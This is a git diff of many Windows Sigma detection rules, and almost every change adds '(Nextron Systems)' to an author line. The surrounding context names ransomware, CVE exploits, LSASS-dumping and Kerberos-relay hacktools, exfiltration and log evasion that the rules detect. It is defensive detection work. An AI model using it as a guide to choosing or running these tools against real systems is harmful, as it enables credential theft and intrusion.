modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml b/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml index 4c5224800..68492df5c 100644 --- a/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml +++ b/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud references: - https://twitter.com/mttaggart/status/1511804863293784064 -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/04/06 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_crime_fireball.yml b/rules/windows/process_creation/proc_creation_win_crime_fireball.yml index c2889cc9e..86dceabc6 100755 --- a/rules/windows/process_creation/proc_creation_win_crime_fireball.yml +++ b/rules/windows/process_creation/proc_creation_win_crime_fireball.yml @@ -5,7 +5,7 @@ description: Detects Archer malware invocation via rundll32 references: - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/ - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/06/03 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml b/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml index af24a4df5..93fdec20b 100644 --- a/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml +++ b/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml @@ -6,7 +6,7 @@ references: - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/ - https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/08 modified: 2021/06/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml b/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml index 3636b6a56..075347775 100644 --- a/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml +++ b/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml @@ -4,7 +4,7 @@ status: stable description: Detects specific process characteristics of Snatch ransomware word document droppers references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/08/26 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml b/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml index 76f97d366..a331f74b5 100644 --- a/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml +++ b/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml @@ -4,7 +4,7 @@ status: stable description: Detects command line parameters or strings often used by crypto miners references: - https://www.poolwatch.io/coin/monero -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/26 modified: 2022/09/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_curl_download.yml b/rules/windows/process_creation/proc_creation_win_curl_download.yml index 8889ae9f8..6656215af 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_download.yml @@ -7,7 +7,7 @@ status: test description: Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server references: - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/05 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_dinjector.yml b/rules/windows/process_creation/proc_creation_win_dinjector.yml index e81383637..612c417c5 100644 --- a/rules/windows/process_creation/proc_creation_win_dinjector.yml +++ b/rules/windows/process_creation/proc_creation_win_dinjector.yml @@ -4,7 +4,7 @@ status: test description: Detects the use of the Dinject PowerShell cradle based on the specific flags references: - https://github.com/snovvcrash/DInjector -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/07 modified: 2022/03/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_disable_service.yml b/rules/windows/process_creation/proc_creation_win_disable_service.yml index 158cfdd99..b34a12ea4 100644 --- a/rules/windows/process_creation/proc_creation_win_disable_service.yml +++ b/rules/windows/process_creation/proc_creation_win_disable_service.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when attackers use "sc.exe" or the powershell "Set-Service" cmdlet to change the startup type of a service to "disabled" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml b/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml index b02f86bd4..be5739594 100644 --- a/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml +++ b/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/02 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml b/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml index 99e5a5ac2..f694c5876 100644 --- a/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml +++ b/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml @@ -7,7 +7,7 @@ status: test description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/05/08 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml index a78a036fb..cbb27d2cb 100644 --- a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml @@ -9,7 +9,7 @@ references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/19 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml index 8b67e3873..48ad25785 100644 --- a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml @@ -9,7 +9,7 @@ references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ - https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/19 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml b/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml index 1cd365834..b6a651470 100644 --- a/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml +++ b/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml @@ -5,7 +5,7 @@ description: Detects usage of Dsacls to grant over permissive permissions references: - https://ss64.com/nt/dsacls.html - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml b/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml index 2bf8cd2e0..6835c0934 100644 --- a/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml +++ b/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml @@ -6,7 +6,7 @@ references: - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone - https://ss64.com/nt/dsacls.html - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml b/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml index 8b44faba3..4d2075134 100644 --- a/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml @@ -4,7 +4,7 @@ status: test description: Detects the use of the filename DumpStack.log to evade Microsoft Defender references: - https://twitter.com/mrd0x/status/1479094189048713219 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/06 modified: 2022/06/17 tags: diff --git a/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml index 10156a867..6bac7231f 100644 --- a/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml +++ b/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml @@ -5,7 +5,7 @@ description: Detects email exfiltration via powershell cmdlets references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml -author: Nasreddine Bencherchali (rule), Azure-Sentinel (idea) +author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) date: 2022/09/09 tags: - attack.exfiltration diff --git a/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml b/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml index c765e50f6..2c6e9b03b 100644 --- a/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml +++ b/rules/windows/process_creation/proc_creation_win_enable_susp_windows_optional_feature.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system - https://learn.microsoft.com/en-us/windows/wsl/install-on-server -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/29 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml b/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml index 0f197287e..6a42b223d 100644 --- a/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml @@ -10,7 +10,7 @@ references: - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt - https://github.com/HyperSine/how-does-MobaXterm-encrypt-password - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml b/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml index a8427c87e..d2ff9fc52 100644 --- a/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml @@ -6,7 +6,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil - https://abuse.io/lockergoga.txt - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 -author: '@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community' +author: '@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community' date: 2019/03/22 modified: 2022/06/28 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml b/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml index ea0a5b2fb..5702b52e9 100644 --- a/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of various cli utility related to web request exfiltrating data references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/02 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml index 7222bdb3d..df45e135c 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml @@ -5,7 +5,7 @@ description: Detects Winword starting uncommon sub process MicroScMgmt.exe as us references: - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/02/22 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml index 3b812365b..6686055e2 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml @@ -4,7 +4,7 @@ status: test description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 references: - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/02/22 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml index cee0661e0..626ae18a7 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml @@ -5,7 +5,7 @@ description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and references: - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/11/23 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml index 2a7f87ef0..9b7eb14dc 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml @@ -5,7 +5,7 @@ description: Detects Winword starting uncommon sub process csc.exe as used in ex references: - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/09/15 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml index 68f24b0a5..8507d69bf 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml @@ -4,7 +4,7 @@ status: test description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 references: - https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua -author: Florian Roth, oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/11/15 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml index 6d6ba4f09..4caefbc84 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml @@ -5,7 +5,7 @@ description: Detects an exploitation attempt in which the UAC consent dialogue i references: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388 - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/11/20 modified: 2022/05/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml index 7abb149d4..bbea5d7ad 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml @@ -5,7 +5,7 @@ description: Detects the exploitation of Zoho ManageEngine Desktop Central Java references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/03/25 modified: 2023/01/21 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml index 3926e9c4b..9aaf3b3c6 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml @@ -5,7 +5,7 @@ description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by th references: - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/15 modified: 2022/07/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml b/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml index aab417f24..d1ad4fe07 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml @@ -5,7 +5,7 @@ description: Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a references: - https://github.com/klinix5/InstallerFileTakeOver - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/22 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml b/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml index 7aa37c897..8d51eb481 100644 --- a/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml +++ b/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml @@ -4,7 +4,7 @@ status: test description: Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM references: - https://github.com/GossiTheDog/SystemNightmare -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/08/11 tags: - attack.privilege_escalation diff --git a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml index cc7b9efa0..2e768157f 100644 --- a/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml @@ -4,7 +4,7 @@ status: experimental description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/12 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml index 79e84d4d7..441502c89 100644 --- a/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml +++ b/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of findstr with the "EVERYONE" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/12 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml b/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml index ab5003732..1f469c3b1 100644 --- a/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/10 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_gmer_execution.yml b/rules/windows/process_creation/proc_creation_win_gmer_execution.yml index 81cbf312a..eba026303 100644 --- a/rules/windows/process_creation/proc_creation_win_gmer_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_gmer_execution.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution GMER tool based on image and hash fields. references: - http://www.gmer.net/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/05 modified: 2022/10/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml b/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml index 23a623135..9a8a24ee3 100644 --- a/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html -author: Nasreddine Bencherchali, X__Junior +author: Nasreddine Bencherchali (Nextron Systems), X__Junior date: 2022/11/30 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml b/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml index 6c7514655..e3084f44b 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml @@ -4,7 +4,7 @@ status: test description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service references: - https://github.com/bats3c/ADCSPwn -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/31 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml b/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml index 28e82fc05..1191d6caa 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml @@ -5,7 +5,7 @@ description: Detects command line parameters used by Bloodhound and Sharphound h references: - https://github.com/BloodHoundAD/BloodHound - https://github.com/BloodHoundAD/SharpHound -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/20 modified: 2022/08/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml b/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml index b0d9b235b..fd1cbbaf8 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml @@ -5,7 +5,7 @@ description: Detects the use of tools created by a well-known hacktool producer references: - https://github.com/cube0x0 - https://www.virustotal.com/gui/search/metadata%253ACube0x0/files -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/27 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml b/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml index f6fc0fa0f..317397084 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml @@ -5,7 +5,7 @@ description: Detects the use of Dumpert process dumper, which dumps the lsass.ex references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/02/04 modified: 2022/12/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hack_htran.yml b/rules/windows/process_creation/proc_creation_win_hack_htran.yml index 5383dec3b..05103430a 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_htran.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_htran.yml @@ -5,7 +5,7 @@ description: Detects exeuctable names or flags used by Htran or Htran-like tools references: - https://github.com/HiwinCN/HTran - https://github.com/cw1997/NATBypass -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/12/27 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml b/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml index 5438d6456..9bfca6829 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml @@ -5,7 +5,7 @@ description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine- references: - https://github.com/Kevin-Robertson/Inveigh - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/24 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml b/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml index 4862e060b..f61a30691 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of KrbRelay, a Kerberos relaying tool references: - https://github.com/cube0x0/KrbRelay -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/27 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml b/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml index 9f51d4759..5967b60bf 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml @@ -4,7 +4,7 @@ status: experimental description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced references: - https://github.com/Dec0ne/KrbRelayUp -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/26 modified: 2022/04/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml b/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml index 608175141..044e396a5 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml @@ -6,7 +6,7 @@ references: - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/ - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html - https://github.com/GhostPack/Rubeus -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/12/19 modified: 2022/10/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml b/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml index 6e3cf2f82..ab58396ed 100644 --- 